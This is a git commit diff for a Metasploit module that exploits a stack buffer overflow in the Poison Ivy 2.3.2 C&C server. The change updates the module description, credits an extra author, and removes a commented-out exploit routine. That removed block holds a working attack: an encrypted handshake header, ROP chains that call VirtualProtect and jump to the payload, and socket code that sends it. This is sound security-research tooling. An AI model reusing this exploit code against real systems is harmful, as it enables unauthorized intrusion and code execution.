poisonivy_bof description updated
jvazquez-r7
parent
8bdf3b56f5
commit
ff4a0bc3aa
|
|
@ -18,22 +18,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
|
||||
The exploit does not need to know the password chosen for the bot/server comm.
|
||||
If the C&C is configured with the default 'admin' password the exploit should
|
||||
work fine. In case of the C&C configured with another password the exploit can
|
||||
fail.
|
||||
The exploit does not need to know the password chosen for the bot/server
|
||||
communication. If the C&C is configured with the default 'admin' password,
|
||||
the exploit should work fine. In case of the C&C configured with another
|
||||
password the exploit can fail. The 'check' command can be used to determine
|
||||
if the C&C target is using the default 'admin' password.
|
||||
|
||||
Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
|
||||
responsible of handling the connection. Because of this the module provides a
|
||||
Bruteforce target. When selected a random header will be sent in case the default
|
||||
for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a
|
||||
session obtained.
|
||||
responsible of handling the connection. Because of this the module provides the
|
||||
RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
|
||||
will be used. If the bruteforce target is selected, a random header will be sent in
|
||||
case the default for the password 'admin' doesn't work. Bruteforce will stop after
|
||||
5 tries or a session obtained.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Andrzej Dereszowski', # Vulnerability Discovery
|
||||
'Gal Badishi' # Exploit and Metasploit module
|
||||
'Gal Badishi', # Exploit and Metasploit module
|
||||
'juan vazquez' # Testing and little of Metasploit-fu
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
@ -176,72 +179,4 @@ end
|
|||
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
|
||||
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
|
||||
|
||||
def exploit
|
||||
|
||||
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
|
||||
# We have a very good chance of succeeding even if the password was changed
|
||||
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
|
||||
|
||||
short_rop = [
|
||||
0x0041F1E9, # 1st jump - will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
|
||||
0x00401000, # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
|
||||
0xFFFF8000, # edx. We'll add this number later to ebp (which will subtract 0x8000 from it).
|
||||
0x0042F63A, # Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
|
||||
0x00000000, # edi (ebp points here now)
|
||||
0x00000000, # esi
|
||||
0x00000000, # ebx
|
||||
0x00426799, # We need this to offset ebp: mov eax,edx # retn
|
||||
0x0041F337, # Subtract 0x8000 from ebp: add ebp,eax # retn
|
||||
0x00403A77, # mov esp,ebp # pop ebp # retn
|
||||
].pack("V*")
|
||||
|
||||
long_rop = [
|
||||
0x00000000, # New ebp
|
||||
0x0041F1E9, # Will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
|
||||
0x0000002C, # edx. We'll add this number later to ebp, to prevent looping.
|
||||
0x0042F63A, # Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
|
||||
0x00000001, # edi. We need it when we call VirtualProtect (ebp points here now)
|
||||
0x00000000, # esi
|
||||
0x00000000, # ebx
|
||||
0x00426799, # We need this to offset ebp: mov eax,edx # retn
|
||||
0x0041F337, # Subtract 0x8000 from ebp: add ebp,eax # retn
|
||||
0x004D82DE, # eax will now point 8 bytes from the beginning of the bigger ROP chain: mov eax,ecx # retn
|
||||
0x004F196E, # push eax (address) and call VirtualProtect, then add ebx, 0x28 # mov edi, 0x46FAC1 # pop esi # pop ebx # mov esp, ebp # pop ebp # ret 8
|
||||
0x00004000, # Size
|
||||
0x00000040, # New protect (0x40 = PAGE_EXECUTE_READWRITE)
|
||||
0x00401000, # Old protect (ptr)
|
||||
0x00000000, # esi
|
||||
0x00000000, # ebx. ebp will point here after the offset, meaning that esp will point here after VirtualProtect.
|
||||
0x0041AA97, # jmp esp (also new ebp)
|
||||
0x00000000, # Discarded
|
||||
0x00000000, # Discarded
|
||||
].pack("V*")
|
||||
|
||||
short_rop_pos = 0x806D
|
||||
long_rop_pos = short_rop_pos - 0x7FF0
|
||||
|
||||
# Handshake
|
||||
connect
|
||||
print_status("Performing handshake...")
|
||||
sock.put("\x00" * 256)
|
||||
sock.get
|
||||
|
||||
# Don't change the nulls, or it might not work
|
||||
xploit = ''
|
||||
xploit << header
|
||||
xploit << "\x00" * (long_rop_pos - xploit.length)
|
||||
xploit << long_rop
|
||||
xploit << payload.encoded
|
||||
xploit << "\x00" * (short_rop_pos - xploit.length)
|
||||
xploit << short_rop
|
||||
|
||||
# The disconnection triggers the exploit
|
||||
print_status("Sending exploit...")
|
||||
sock.put(xploit)
|
||||
select(nil,nil,nil,5)
|
||||
disconnect
|
||||
|
||||
# Time to own the box
|
||||
handler
|
||||
end
|
||||
=end
|
||||
|
|
|
|||
Loading…
Reference in New Issue